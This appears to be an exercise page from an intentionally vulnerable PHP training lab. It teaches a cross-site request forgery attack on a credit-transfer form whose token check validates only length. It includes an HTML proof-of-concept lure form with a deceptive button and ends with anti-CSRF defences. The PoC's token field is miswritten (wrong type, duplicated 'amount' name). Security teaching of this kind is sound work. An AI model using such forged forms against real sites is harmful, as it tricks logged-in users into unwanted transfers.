PHP Session Memory User System

Credit Transfer - Medium

Bonus Medium

Goal: Trigger the transfer from an external page and bypass the token check with a fake token of the right length.

Hints

The server now checks something about the token, but not the value itself.
Inspect how long the legitimate token is and reproduce only that property.
A random same-length string is enough when validation is reduced to length.

Why This Works

This is a classic broken CSRF defense. The application adds a token field but validates only superficial properties such as length, which attackers can copy without knowing the victim token.

Instructions:

Creating an Account:
- Navigate to the "Register" section.
- Enter a unique username.
- Enter a password.
- Click on the "Register" button.
- If successful, you will see a message saying "Registration successful!".
Logging In:
- Navigate to the "Login" section.
- Enter the username and password you registered with.
- Click on the "Login" button.
- If successful, you will see options for transferring credits and your current credit balance.

Creating a CSRF PoC: CSRF is a type of attack where an attacker tricks a victim into performing an unwanted action on a website where they're authenticated, usually without the victim's knowledge or consent. In this exercise, we'll demonstrate a simple CSRF attack by creating a form that can transfer credits from a logged-in user's account to another user without their knowledge. To find the exploit, try entering a CSRF token of the same length and adding it to the HTML PoC.

<!DOCTYPE html>
        <html lang="en">
        <head>
            <meta charset="UTF-8">
            <meta http-equiv="X-UA-Compatible" content="IE=edge">
            <meta name="viewport" content="width=device-width, initial-scale=1.0">
            <title>CSRF PoC</title>
        </head>
        <body>

        <h2>CSRF Attack Example</h2>

        <p>This page is crafted by an attacker to demonstrate a CSRF vulnerability. In a real-world scenario, a victim would be lured to this page while logged into the target website.</p>

        <form action="TARGET_URL" method="post">
            <input type="hidden" name="receiver" value="user1">
            <input type="hidden" name="amount" value="100">
            <input type="csrf_token" name="amount" value="........">

            <input type="submit" value="Click me for a surprise!">
        </form>

        </body>
        </html>

Create an HTML page with the necessary form.
Replace `TARGET_URL` with the URL where the original PHP page is hosted.
When a logged-in user visits this crafted page and clicks on the provided button, credits will be transferred without their direct consent.

Testing the CSRF PoC:
- Log in to the original PHP website with any user account (e.g., user2).
- Visit the crafted CSRF PoC HTML page you created.
- Click on the provided button.
- Go back to the original PHP website and check the credits of the logged-in user and `user1`. You should notice that credits have been transferred.
Protecting Against CSRF: Implementing anti-CSRF tokens is a common measure to prevent CSRF attacks. With this mechanism, every form submission requires a unique token. Without the correct token, the server will reject the request.
- Generate a unique token for every form displayed to the user.
- Store this token in the user's session and also send it as a hidden field in the form.
- On form submission, compare the token from the form with the one in the user's session. If they match, process the request. If not, reject it.
- This ensures that only forms generated by your website can be used to submit data, preventing attackers from creating malicious forms to exploit CSRF vulnerabilities.

Hide Instructions

Username	Credits
user1	5000
user2	4500
user3	4000

Credit Transfer - Medium

Instructions:

Register

Login

Users and Credits